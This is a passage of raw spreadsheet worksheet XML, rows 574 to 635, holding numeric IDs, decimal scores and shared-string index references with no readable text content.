      <c r="E574">
        <v>0.99860000610351563</v>
      </c>
      <c r="F574" t="s">
        <v>7</v>
      </c>
      <c r="G574" t="s">
        <v>1136</v>
      </c>
      <c r="H574" t="s">
        <v>1137</v>
      </c>
    </row>
    <row r="575" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A575" s="1">
        <v>573</v>
      </c>
      <c r="B575">
        <v>4703</v>
      </c>
      <c r="C575">
        <v>4703</v>
      </c>
      <c r="D575">
        <v>0</v>
      </c>
      <c r="E575">
        <v>0.99519997835159302</v>
      </c>
      <c r="F575" t="s">
        <v>7</v>
      </c>
      <c r="G575" t="s">
        <v>1138</v>
      </c>
      <c r="H575" t="s">
        <v>1139</v>
      </c>
    </row>
    <row r="576" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A576" s="1">
        <v>574</v>
      </c>
      <c r="B576">
        <v>4710</v>
      </c>
      <c r="C576">
        <v>4710</v>
      </c>
      <c r="D576">
        <v>0</v>
      </c>
      <c r="E576">
        <v>0.99129998683929443</v>
      </c>
      <c r="F576" t="s">
        <v>7</v>
      </c>
      <c r="G576" t="s">
        <v>1140</v>
      </c>
      <c r="H576" t="s">
        <v>1141</v>
      </c>
    </row>
    <row r="577" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A577" s="1">
        <v>575</v>
      </c>
      <c r="B577">
        <v>7193</v>
      </c>
      <c r="C577">
        <v>7193</v>
      </c>
      <c r="D577">
        <v>0</v>
      </c>
      <c r="E577">
        <v>0.73799997568130493</v>
      </c>
      <c r="F577" t="s">
        <v>7</v>
      </c>
      <c r="G577" t="s">
        <v>1142</v>
      </c>
      <c r="H577" t="s">
        <v>1143</v>
      </c>
    </row>
    <row r="578" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A578" s="1">
        <v>576</v>
      </c>
      <c r="B578">
        <v>4698</v>
      </c>
      <c r="C578">
        <v>4698</v>
      </c>
      <c r="D578">
        <v>0</v>
      </c>
      <c r="E578">
        <v>0.89319998025894165</v>
      </c>
      <c r="F578" t="s">
        <v>7</v>
      </c>
      <c r="G578" t="s">
        <v>1144</v>
      </c>
      <c r="H578" t="s">
        <v>1145</v>
      </c>
    </row>
    <row r="579" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A579" s="1">
        <v>577</v>
      </c>
      <c r="B579">
        <v>4696</v>
      </c>
      <c r="C579">
        <v>4696</v>
      </c>
      <c r="D579">
        <v>0</v>
      </c>
      <c r="E579">
        <v>0.8245999813079834</v>
      </c>
      <c r="F579" t="s">
        <v>7</v>
      </c>
      <c r="G579" t="s">
        <v>1146</v>
      </c>
      <c r="H579" t="s">
        <v>1147</v>
      </c>
    </row>
    <row r="580" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A580" s="1">
        <v>578</v>
      </c>
      <c r="B580">
        <v>5922</v>
      </c>
      <c r="C580">
        <v>5922</v>
      </c>
      <c r="D580">
        <v>0</v>
      </c>
      <c r="E580">
        <v>0.9659000039100647</v>
      </c>
      <c r="F580" t="s">
        <v>7</v>
      </c>
      <c r="G580" t="s">
        <v>1148</v>
      </c>
      <c r="H580" t="s">
        <v>1149</v>
      </c>
    </row>
    <row r="581" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A581" s="1">
        <v>579</v>
      </c>
      <c r="B581">
        <v>1629</v>
      </c>
      <c r="C581">
        <v>1629</v>
      </c>
      <c r="D581">
        <v>0</v>
      </c>
      <c r="E581">
        <v>0.52770000696182251</v>
      </c>
      <c r="F581" t="s">
        <v>7</v>
      </c>
      <c r="G581" t="s">
        <v>1150</v>
      </c>
      <c r="H581" t="s">
        <v>1151</v>
      </c>
    </row>
    <row r="582" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A582" s="1">
        <v>580</v>
      </c>
      <c r="B582">
        <v>1630</v>
      </c>
      <c r="C582">
        <v>1630</v>
      </c>
      <c r="D582">
        <v>0</v>
      </c>
      <c r="E582">
        <v>0.57200002670288086</v>
      </c>
      <c r="F582" t="s">
        <v>7</v>
      </c>
      <c r="G582" t="s">
        <v>1152</v>
      </c>
      <c r="H582" t="s">
        <v>1153</v>
      </c>
    </row>
    <row r="583" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A583" s="1">
        <v>581</v>
      </c>
      <c r="B583">
        <v>7179</v>
      </c>
      <c r="C583">
        <v>7179</v>
      </c>
      <c r="D583">
        <v>0</v>
      </c>
      <c r="E583">
        <v>0.86250001192092896</v>
      </c>
      <c r="F583" t="s">
        <v>7</v>
      </c>
      <c r="G583" t="s">
        <v>1154</v>
      </c>
      <c r="H583" t="s">
        <v>1155</v>
      </c>
    </row>
    <row r="584" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A584" s="1">
        <v>582</v>
      </c>
      <c r="B584">
        <v>4690</v>
      </c>
      <c r="C584">
        <v>4690</v>
      </c>
      <c r="D584">
        <v>0</v>
      </c>
      <c r="E584">
        <v>0.84270000457763672</v>
      </c>
      <c r="F584" t="s">
        <v>7</v>
      </c>
      <c r="G584" t="s">
        <v>1156</v>
      </c>
      <c r="H584" t="s">
        <v>1157</v>
      </c>
    </row>
    <row r="585" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A585" s="1">
        <v>583</v>
      </c>
      <c r="B585">
        <v>4700</v>
      </c>
      <c r="C585">
        <v>4700</v>
      </c>
      <c r="D585">
        <v>0</v>
      </c>
      <c r="E585">
        <v>0.58149999380111694</v>
      </c>
      <c r="F585" t="s">
        <v>7</v>
      </c>
      <c r="G585" t="s">
        <v>1158</v>
      </c>
      <c r="H585" t="s">
        <v>1159</v>
      </c>
    </row>
    <row r="586" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A586" s="1">
        <v>584</v>
      </c>
      <c r="B586">
        <v>4689</v>
      </c>
      <c r="C586">
        <v>4689</v>
      </c>
      <c r="D586">
        <v>0</v>
      </c>
      <c r="E586">
        <v>0.43799999356269842</v>
      </c>
      <c r="F586" t="s">
        <v>7</v>
      </c>
      <c r="G586" t="s">
        <v>1160</v>
      </c>
      <c r="H586" t="s">
        <v>1161</v>
      </c>
    </row>
    <row r="587" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A587" s="1">
        <v>585</v>
      </c>
      <c r="B587">
        <v>4711</v>
      </c>
      <c r="C587">
        <v>4711</v>
      </c>
      <c r="D587">
        <v>0</v>
      </c>
      <c r="E587">
        <v>0.96850001811981201</v>
      </c>
      <c r="F587" t="s">
        <v>7</v>
      </c>
      <c r="G587" t="s">
        <v>1162</v>
      </c>
      <c r="H587" t="s">
        <v>1163</v>
      </c>
    </row>
    <row r="588" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A588" s="1">
        <v>586</v>
      </c>
      <c r="B588">
        <v>4713</v>
      </c>
      <c r="C588">
        <v>4713</v>
      </c>
      <c r="D588">
        <v>0</v>
      </c>
      <c r="E588">
        <v>0.99790000915527344</v>
      </c>
      <c r="F588" t="s">
        <v>7</v>
      </c>
      <c r="G588" t="s">
        <v>1164</v>
      </c>
      <c r="H588" t="s">
        <v>1165</v>
      </c>
    </row>
    <row r="589" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A589" s="1">
        <v>587</v>
      </c>
      <c r="B589">
        <v>7218</v>
      </c>
      <c r="C589">
        <v>7218</v>
      </c>
      <c r="D589">
        <v>0</v>
      </c>
      <c r="E589">
        <v>0.4440000057220459</v>
      </c>
      <c r="F589" t="s">
        <v>7</v>
      </c>
      <c r="G589" t="s">
        <v>1166</v>
      </c>
      <c r="H589" t="s">
        <v>1167</v>
      </c>
    </row>
    <row r="590" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A590" s="1">
        <v>588</v>
      </c>
      <c r="B590">
        <v>1583</v>
      </c>
      <c r="C590">
        <v>1583</v>
      </c>
      <c r="D590">
        <v>0</v>
      </c>
      <c r="E590">
        <v>0.85820001363754272</v>
      </c>
      <c r="F590" t="s">
        <v>7</v>
      </c>
      <c r="G590" t="s">
        <v>1168</v>
      </c>
      <c r="H590" t="s">
        <v>1169</v>
      </c>
    </row>
    <row r="591" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A591" s="1">
        <v>589</v>
      </c>
      <c r="B591">
        <v>1584</v>
      </c>
      <c r="C591">
        <v>1584</v>
      </c>
      <c r="D591">
        <v>0</v>
      </c>
      <c r="E591">
        <v>0.99779999256134033</v>
      </c>
      <c r="F591" t="s">
        <v>7</v>
      </c>
      <c r="G591" t="s">
        <v>1170</v>
      </c>
      <c r="H591" t="s">
        <v>983</v>
      </c>
    </row>
    <row r="592" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A592" s="1">
        <v>590</v>
      </c>
      <c r="B592">
        <v>4722</v>
      </c>
      <c r="C592">
        <v>4722</v>
      </c>
      <c r="D592">
        <v>0</v>
      </c>
      <c r="E592">
        <v>0.99129998683929443</v>
      </c>
      <c r="F592" t="s">
        <v>7</v>
      </c>
      <c r="G592" t="s">
        <v>1171</v>
      </c>
      <c r="H592" t="s">
        <v>1172</v>
      </c>
    </row>
    <row r="593" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A593" s="1">
        <v>591</v>
      </c>
      <c r="B593">
        <v>1586</v>
      </c>
      <c r="C593">
        <v>1586</v>
      </c>
      <c r="D593">
        <v>0</v>
      </c>
      <c r="E593">
        <v>0.38379999995231628</v>
      </c>
      <c r="F593" t="s">
        <v>7</v>
      </c>
      <c r="G593" t="s">
        <v>1173</v>
      </c>
      <c r="H593" t="s">
        <v>1174</v>
      </c>
    </row>
    <row r="594" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A594" s="1">
        <v>592</v>
      </c>
      <c r="B594">
        <v>4721</v>
      </c>
      <c r="C594">
        <v>4721</v>
      </c>
      <c r="D594">
        <v>0</v>
      </c>
      <c r="E594">
        <v>0.99709999561309814</v>
      </c>
      <c r="F594" t="s">
        <v>7</v>
      </c>
      <c r="G594" t="s">
        <v>1175</v>
      </c>
      <c r="H594" t="s">
        <v>1176</v>
      </c>
    </row>
    <row r="595" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A595" s="1">
        <v>593</v>
      </c>
      <c r="B595">
        <v>4720</v>
      </c>
      <c r="C595">
        <v>4720</v>
      </c>
      <c r="D595">
        <v>0</v>
      </c>
      <c r="E595">
        <v>0.99040001630783081</v>
      </c>
      <c r="F595" t="s">
        <v>7</v>
      </c>
      <c r="G595" t="s">
        <v>1177</v>
      </c>
      <c r="H595" t="s">
        <v>1178</v>
      </c>
    </row>
    <row r="596" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A596" s="1">
        <v>594</v>
      </c>
      <c r="B596">
        <v>4712</v>
      </c>
      <c r="C596">
        <v>4712</v>
      </c>
      <c r="D596">
        <v>0</v>
      </c>
      <c r="E596">
        <v>0.99879997968673706</v>
      </c>
      <c r="F596" t="s">
        <v>7</v>
      </c>
      <c r="G596" t="s">
        <v>1179</v>
      </c>
      <c r="H596" t="s">
        <v>1180</v>
      </c>
    </row>
    <row r="597" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A597" s="1">
        <v>595</v>
      </c>
      <c r="B597">
        <v>4719</v>
      </c>
      <c r="C597">
        <v>4719</v>
      </c>
      <c r="D597">
        <v>0</v>
      </c>
      <c r="E597">
        <v>0.99620002508163452</v>
      </c>
      <c r="F597" t="s">
        <v>7</v>
      </c>
      <c r="G597" t="s">
        <v>1181</v>
      </c>
      <c r="H597" t="s">
        <v>1182</v>
      </c>
    </row>
    <row r="598" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A598" s="1">
        <v>596</v>
      </c>
      <c r="B598">
        <v>7215</v>
      </c>
      <c r="C598">
        <v>7215</v>
      </c>
      <c r="D598">
        <v>0</v>
      </c>
      <c r="E598">
        <v>0.99870002269744873</v>
      </c>
      <c r="F598" t="s">
        <v>7</v>
      </c>
      <c r="G598" t="s">
        <v>1183</v>
      </c>
      <c r="H598" t="s">
        <v>1184</v>
      </c>
    </row>
    <row r="599" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A599" s="1">
        <v>597</v>
      </c>
      <c r="B599">
        <v>7213</v>
      </c>
      <c r="C599">
        <v>7213</v>
      </c>
      <c r="D599">
        <v>0</v>
      </c>
      <c r="E599">
        <v>0.77719998359680176</v>
      </c>
      <c r="F599" t="s">
        <v>7</v>
      </c>
      <c r="G599" t="s">
        <v>1185</v>
      </c>
      <c r="H599" t="s">
        <v>1186</v>
      </c>
    </row>
    <row r="600" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A600" s="1">
        <v>598</v>
      </c>
      <c r="B600">
        <v>7211</v>
      </c>
      <c r="C600">
        <v>7211</v>
      </c>
      <c r="D600">
        <v>0</v>
      </c>
      <c r="E600">
        <v>0.7369999885559082</v>
      </c>
      <c r="F600" t="s">
        <v>7</v>
      </c>
      <c r="G600" t="s">
        <v>1187</v>
      </c>
      <c r="H600" t="s">
        <v>1188</v>
      </c>
    </row>
    <row r="601" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A601" s="1">
        <v>599</v>
      </c>
      <c r="B601">
        <v>7210</v>
      </c>
      <c r="C601">
        <v>7210</v>
      </c>
      <c r="D601">
        <v>0</v>
      </c>
      <c r="E601">
        <v>0.72560000419616699</v>
      </c>
      <c r="F601" t="s">
        <v>7</v>
      </c>
      <c r="G601" t="s">
        <v>1189</v>
      </c>
      <c r="H601" t="s">
        <v>1190</v>
      </c>
    </row>
    <row r="602" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A602" s="1">
        <v>600</v>
      </c>
      <c r="B602">
        <v>7209</v>
      </c>
      <c r="C602">
        <v>7209</v>
      </c>
      <c r="D602">
        <v>0</v>
      </c>
      <c r="E602">
        <v>0.73849999904632568</v>
      </c>
      <c r="F602" t="s">
        <v>7</v>
      </c>
      <c r="G602" t="s">
        <v>1191</v>
      </c>
      <c r="H602" t="s">
        <v>1192</v>
      </c>
    </row>
    <row r="603" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A603" s="1">
        <v>601</v>
      </c>
      <c r="B603">
        <v>4718</v>
      </c>
      <c r="C603">
        <v>4718</v>
      </c>
      <c r="D603">
        <v>0</v>
      </c>
      <c r="E603">
        <v>0.98240000009536743</v>
      </c>
      <c r="F603" t="s">
        <v>7</v>
      </c>
      <c r="G603" t="s">
        <v>1193</v>
      </c>
      <c r="H603" t="s">
        <v>1194</v>
      </c>
    </row>
    <row r="604" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A604" s="1">
        <v>602</v>
      </c>
      <c r="B604">
        <v>4714</v>
      </c>
      <c r="C604">
        <v>4714</v>
      </c>
      <c r="D604">
        <v>0</v>
      </c>
      <c r="E604">
        <v>0.99809998273849487</v>
      </c>
      <c r="F604" t="s">
        <v>7</v>
      </c>
      <c r="G604" t="s">
        <v>1195</v>
      </c>
      <c r="H604" t="s">
        <v>1196</v>
      </c>
    </row>
    <row r="605" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A605" s="1">
        <v>603</v>
      </c>
      <c r="B605">
        <v>7216</v>
      </c>
      <c r="C605">
        <v>7216</v>
      </c>
      <c r="D605">
        <v>0</v>
      </c>
      <c r="E605">
        <v>0.64389997720718384</v>
      </c>
      <c r="F605" t="s">
        <v>7</v>
      </c>
      <c r="G605" t="s">
        <v>1197</v>
      </c>
      <c r="H605" t="s">
        <v>1198</v>
      </c>
    </row>
    <row r="606" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A606" s="1">
        <v>604</v>
      </c>
      <c r="B606">
        <v>1638</v>
      </c>
      <c r="C606">
        <v>1638</v>
      </c>
      <c r="D606">
        <v>0</v>
      </c>
      <c r="E606">
        <v>0.54589998722076416</v>
      </c>
      <c r="F606" t="s">
        <v>7</v>
      </c>
      <c r="G606" t="s">
        <v>1199</v>
      </c>
      <c r="H606" t="s">
        <v>1200</v>
      </c>
    </row>
    <row r="607" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A607" s="1">
        <v>605</v>
      </c>
      <c r="B607">
        <v>7176</v>
      </c>
      <c r="C607">
        <v>7176</v>
      </c>
      <c r="D607">
        <v>0</v>
      </c>
      <c r="E607">
        <v>0.67470002174377441</v>
      </c>
      <c r="F607" t="s">
        <v>7</v>
      </c>
      <c r="G607" t="s">
        <v>1201</v>
      </c>
      <c r="H607" t="s">
        <v>1202</v>
      </c>
    </row>
    <row r="608" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A608" s="1">
        <v>606</v>
      </c>
      <c r="B608">
        <v>1646</v>
      </c>
      <c r="C608">
        <v>1646</v>
      </c>
      <c r="D608">
        <v>0</v>
      </c>
      <c r="E608">
        <v>0.49799999594688421</v>
      </c>
      <c r="F608" t="s">
        <v>7</v>
      </c>
      <c r="G608" t="s">
        <v>1203</v>
      </c>
      <c r="H608" t="s">
        <v>1204</v>
      </c>
    </row>
    <row r="609" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A609" s="1">
        <v>607</v>
      </c>
      <c r="B609">
        <v>1692</v>
      </c>
      <c r="C609">
        <v>1692</v>
      </c>
      <c r="D609">
        <v>0</v>
      </c>
      <c r="E609">
        <v>0.99949997663497925</v>
      </c>
      <c r="F609" t="s">
        <v>7</v>
      </c>
      <c r="G609" t="s">
        <v>1205</v>
      </c>
      <c r="H609" t="s">
        <v>1206</v>
      </c>
    </row>
    <row r="610" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A610" s="1">
        <v>608</v>
      </c>
      <c r="B610">
        <v>1693</v>
      </c>
      <c r="C610">
        <v>1693</v>
      </c>
      <c r="D610">
        <v>0</v>
      </c>
      <c r="E610">
        <v>0.99709999561309814</v>
      </c>
      <c r="F610" t="s">
        <v>7</v>
      </c>
      <c r="G610" t="s">
        <v>1207</v>
      </c>
      <c r="H610" t="s">
        <v>1208</v>
      </c>
    </row>
    <row r="611" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A611" s="1">
        <v>609</v>
      </c>
      <c r="B611">
        <v>1694</v>
      </c>
      <c r="C611">
        <v>1694</v>
      </c>
      <c r="D611">
        <v>0</v>
      </c>
      <c r="E611">
        <v>0.99739998579025269</v>
      </c>
      <c r="F611" t="s">
        <v>7</v>
      </c>
      <c r="G611" t="s">
        <v>1209</v>
      </c>
      <c r="H611" t="s">
        <v>1210</v>
      </c>
    </row>
    <row r="612" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A612" s="1">
        <v>610</v>
      </c>
      <c r="B612">
        <v>1695</v>
      </c>
      <c r="C612">
        <v>1695</v>
      </c>
      <c r="D612">
        <v>0</v>
      </c>
      <c r="E612">
        <v>0.93209999799728394</v>
      </c>
      <c r="F612" t="s">
        <v>7</v>
      </c>
      <c r="G612" t="s">
        <v>1211</v>
      </c>
      <c r="H612" t="s">
        <v>1212</v>
      </c>
    </row>
    <row r="613" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A613" s="1">
        <v>611</v>
      </c>
      <c r="B613">
        <v>1696</v>
      </c>
      <c r="C613">
        <v>1696</v>
      </c>
      <c r="D613">
        <v>0</v>
      </c>
      <c r="E613">
        <v>0.99409997463226318</v>
      </c>
      <c r="F613" t="s">
        <v>7</v>
      </c>
      <c r="G613" t="s">
        <v>1213</v>
      </c>
      <c r="H613" t="s">
        <v>1214</v>
      </c>
    </row>
    <row r="614" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A614" s="1">
        <v>612</v>
      </c>
      <c r="B614">
        <v>1697</v>
      </c>
      <c r="C614">
        <v>1697</v>
      </c>
      <c r="D614">
        <v>0</v>
      </c>
      <c r="E614">
        <v>0.53130000829696655</v>
      </c>
      <c r="F614" t="s">
        <v>7</v>
      </c>
      <c r="G614" t="s">
        <v>1215</v>
      </c>
      <c r="H614" t="s">
        <v>1216</v>
      </c>
    </row>
    <row r="615" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A615" s="1">
        <v>613</v>
      </c>
      <c r="B615">
        <v>1698</v>
      </c>
      <c r="C615">
        <v>1698</v>
      </c>
      <c r="D615">
        <v>0</v>
      </c>
      <c r="E615">
        <v>0.99839997291564941</v>
      </c>
      <c r="F615" t="s">
        <v>7</v>
      </c>
      <c r="G615" t="s">
        <v>1217</v>
      </c>
      <c r="H615" t="s">
        <v>1218</v>
      </c>
    </row>
    <row r="616" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A616" s="1">
        <v>614</v>
      </c>
      <c r="B616">
        <v>1691</v>
      </c>
      <c r="C616">
        <v>1691</v>
      </c>
      <c r="D616">
        <v>0</v>
      </c>
      <c r="E616">
        <v>0.69690001010894775</v>
      </c>
      <c r="F616" t="s">
        <v>7</v>
      </c>
      <c r="G616" t="s">
        <v>1219</v>
      </c>
      <c r="H616" t="s">
        <v>1220</v>
      </c>
    </row>
    <row r="617" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A617" s="1">
        <v>615</v>
      </c>
      <c r="B617">
        <v>1699</v>
      </c>
      <c r="C617">
        <v>1699</v>
      </c>
      <c r="D617">
        <v>0</v>
      </c>
      <c r="E617">
        <v>0.99860000610351563</v>
      </c>
      <c r="F617" t="s">
        <v>7</v>
      </c>
      <c r="G617" t="s">
        <v>1221</v>
      </c>
      <c r="H617" t="s">
        <v>1222</v>
      </c>
    </row>
    <row r="618" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A618" s="1">
        <v>616</v>
      </c>
      <c r="B618">
        <v>1701</v>
      </c>
      <c r="C618">
        <v>1701</v>
      </c>
      <c r="D618">
        <v>0</v>
      </c>
      <c r="E618">
        <v>0.48159998655319208</v>
      </c>
      <c r="F618" t="s">
        <v>7</v>
      </c>
      <c r="G618" t="s">
        <v>1223</v>
      </c>
      <c r="H618" t="s">
        <v>1224</v>
      </c>
    </row>
    <row r="619" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A619" s="1">
        <v>617</v>
      </c>
      <c r="B619">
        <v>1702</v>
      </c>
      <c r="C619">
        <v>1702</v>
      </c>
      <c r="D619">
        <v>0</v>
      </c>
      <c r="E619">
        <v>0.8312000036239624</v>
      </c>
      <c r="F619" t="s">
        <v>7</v>
      </c>
      <c r="G619" t="s">
        <v>1225</v>
      </c>
      <c r="H619" t="s">
        <v>1226</v>
      </c>
    </row>
    <row r="620" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A620" s="1">
        <v>618</v>
      </c>
      <c r="B620">
        <v>1703</v>
      </c>
      <c r="C620">
        <v>1703</v>
      </c>
      <c r="D620">
        <v>0</v>
      </c>
      <c r="E620">
        <v>0.99959999322891235</v>
      </c>
      <c r="F620" t="s">
        <v>7</v>
      </c>
      <c r="G620" t="s">
        <v>1227</v>
      </c>
      <c r="H620" t="s">
        <v>1093</v>
      </c>
    </row>
    <row r="621" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A621" s="1">
        <v>619</v>
      </c>
      <c r="B621">
        <v>1706</v>
      </c>
      <c r="C621">
        <v>1706</v>
      </c>
      <c r="D621">
        <v>0</v>
      </c>
      <c r="E621">
        <v>0.60659998655319214</v>
      </c>
      <c r="F621" t="s">
        <v>7</v>
      </c>
      <c r="G621" t="s">
        <v>1228</v>
      </c>
      <c r="H621" t="s">
        <v>1229</v>
      </c>
    </row>
    <row r="622" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A622" s="1">
        <v>620</v>
      </c>
      <c r="B622">
        <v>1707</v>
      </c>
      <c r="C622">
        <v>1707</v>
      </c>
      <c r="D622">
        <v>0</v>
      </c>
      <c r="E622">
        <v>0.71810001134872437</v>
      </c>
      <c r="F622" t="s">
        <v>7</v>
      </c>
      <c r="G622" t="s">
        <v>1230</v>
      </c>
      <c r="H622" t="s">
        <v>1231</v>
      </c>
    </row>
    <row r="623" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A623" s="1">
        <v>621</v>
      </c>
      <c r="B623">
        <v>1708</v>
      </c>
      <c r="C623">
        <v>1708</v>
      </c>
      <c r="D623">
        <v>0</v>
      </c>
      <c r="E623">
        <v>0.52939999103546143</v>
      </c>
      <c r="F623" t="s">
        <v>7</v>
      </c>
      <c r="G623" t="s">
        <v>1232</v>
      </c>
      <c r="H623" t="s">
        <v>1233</v>
      </c>
    </row>
    <row r="624" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A624" s="1">
        <v>622</v>
      </c>
      <c r="B624">
        <v>1710</v>
      </c>
      <c r="C624">
        <v>1710</v>
      </c>
      <c r="D624">
        <v>0</v>
      </c>
      <c r="E624">
        <v>0.47110000252723688</v>
      </c>
      <c r="F624" t="s">
        <v>7</v>
      </c>
      <c r="G624" t="s">
        <v>1234</v>
      </c>
      <c r="H624" t="s">
        <v>1235</v>
      </c>
    </row>
    <row r="625" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A625" s="1">
        <v>623</v>
      </c>
      <c r="B625">
        <v>1700</v>
      </c>
      <c r="C625">
        <v>1700</v>
      </c>
      <c r="D625">
        <v>0</v>
      </c>
      <c r="E625">
        <v>0.82910001277923584</v>
      </c>
      <c r="F625" t="s">
        <v>7</v>
      </c>
      <c r="G625" t="s">
        <v>1236</v>
      </c>
      <c r="H625" t="s">
        <v>1237</v>
      </c>
    </row>
    <row r="626" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A626" s="1">
        <v>624</v>
      </c>
      <c r="B626">
        <v>1690</v>
      </c>
      <c r="C626">
        <v>1690</v>
      </c>
      <c r="D626">
        <v>0</v>
      </c>
      <c r="E626">
        <v>0.53130000829696655</v>
      </c>
      <c r="F626" t="s">
        <v>7</v>
      </c>
      <c r="G626" t="s">
        <v>1238</v>
      </c>
      <c r="H626" t="s">
        <v>1216</v>
      </c>
    </row>
    <row r="627" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A627" s="1">
        <v>625</v>
      </c>
      <c r="B627">
        <v>1688</v>
      </c>
      <c r="C627">
        <v>1688</v>
      </c>
      <c r="D627">
        <v>0</v>
      </c>
      <c r="E627">
        <v>0.52640002965927124</v>
      </c>
      <c r="F627" t="s">
        <v>7</v>
      </c>
      <c r="G627" t="s">
        <v>1239</v>
      </c>
      <c r="H627" t="s">
        <v>1240</v>
      </c>
    </row>
    <row r="628" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A628" s="1">
        <v>626</v>
      </c>
      <c r="B628">
        <v>1687</v>
      </c>
      <c r="C628">
        <v>1687</v>
      </c>
      <c r="D628">
        <v>0</v>
      </c>
      <c r="E628">
        <v>0.80010002851486206</v>
      </c>
      <c r="F628" t="s">
        <v>7</v>
      </c>
      <c r="G628" t="s">
        <v>1241</v>
      </c>
      <c r="H628" t="s">
        <v>1242</v>
      </c>
    </row>
    <row r="629" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A629" s="1">
        <v>627</v>
      </c>
      <c r="B629">
        <v>7175</v>
      </c>
      <c r="C629">
        <v>7175</v>
      </c>
      <c r="D629">
        <v>0</v>
      </c>
      <c r="E629">
        <v>0.61799997091293335</v>
      </c>
      <c r="F629" t="s">
        <v>7</v>
      </c>
      <c r="G629" t="s">
        <v>1243</v>
      </c>
      <c r="H629" t="s">
        <v>1244</v>
      </c>
    </row>
    <row r="630" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A630" s="1">
        <v>628</v>
      </c>
      <c r="B630">
        <v>1651</v>
      </c>
      <c r="C630">
        <v>1651</v>
      </c>
      <c r="D630">
        <v>0</v>
      </c>
      <c r="E630">
        <v>0.57359999418258667</v>
      </c>
      <c r="F630" t="s">
        <v>7</v>
      </c>
      <c r="G630" t="s">
        <v>1245</v>
      </c>
      <c r="H630" t="s">
        <v>1246</v>
      </c>
    </row>
    <row r="631" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A631" s="1">
        <v>629</v>
      </c>
      <c r="B631">
        <v>1665</v>
      </c>
      <c r="C631">
        <v>1665</v>
      </c>
      <c r="D631">
        <v>0</v>
      </c>
      <c r="E631">
        <v>0.88040000200271606</v>
      </c>
      <c r="F631" t="s">
        <v>7</v>
      </c>
      <c r="G631" t="s">
        <v>1247</v>
      </c>
      <c r="H631" t="s">
        <v>1248</v>
      </c>
    </row>
    <row r="632" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A632" s="1">
        <v>630</v>
      </c>
      <c r="B632">
        <v>7161</v>
      </c>
      <c r="C632">
        <v>7161</v>
      </c>
      <c r="D632">
        <v>0</v>
      </c>
      <c r="E632">
        <v>0.87360000610351563</v>
      </c>
      <c r="F632" t="s">
        <v>7</v>
      </c>
      <c r="G632" t="s">
        <v>1249</v>
      </c>
      <c r="H632" t="s">
        <v>1250</v>
      </c>
    </row>
    <row r="633" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A633" s="1">
        <v>631</v>
      </c>
      <c r="B633">
        <v>5927</v>
      </c>
      <c r="C633">
        <v>5927</v>
      </c>
      <c r="D633">
        <v>0</v>
      </c>
      <c r="E633">
        <v>0.9650999903678894</v>
      </c>
      <c r="F633" t="s">
        <v>7</v>
      </c>
      <c r="G633" t="s">
        <v>1251</v>
      </c>
      <c r="H633" t="s">
        <v>1252</v>
      </c>
    </row>
    <row r="634" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A634" s="1">
        <v>632</v>
      </c>
      <c r="B634">
        <v>1672</v>
      </c>
      <c r="C634">
        <v>1672</v>
      </c>
      <c r="D634">
        <v>0</v>
      </c>
      <c r="E634">
        <v>0.99800002574920654</v>
      </c>
      <c r="F634" t="s">
        <v>7</v>
      </c>
      <c r="G634" t="s">
        <v>1253</v>
      </c>
      <c r="H634" t="s">
        <v>1254</v>
      </c>
    </row>
    <row r="635" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A635" s="1">
        <v>633</v>
      </c>
      <c r="B635">
        <v>1674</v>
      </c>
      <c r="C635">
        <v>1674</v>
      </c>
      <c r="D635">
        <v>0</v>
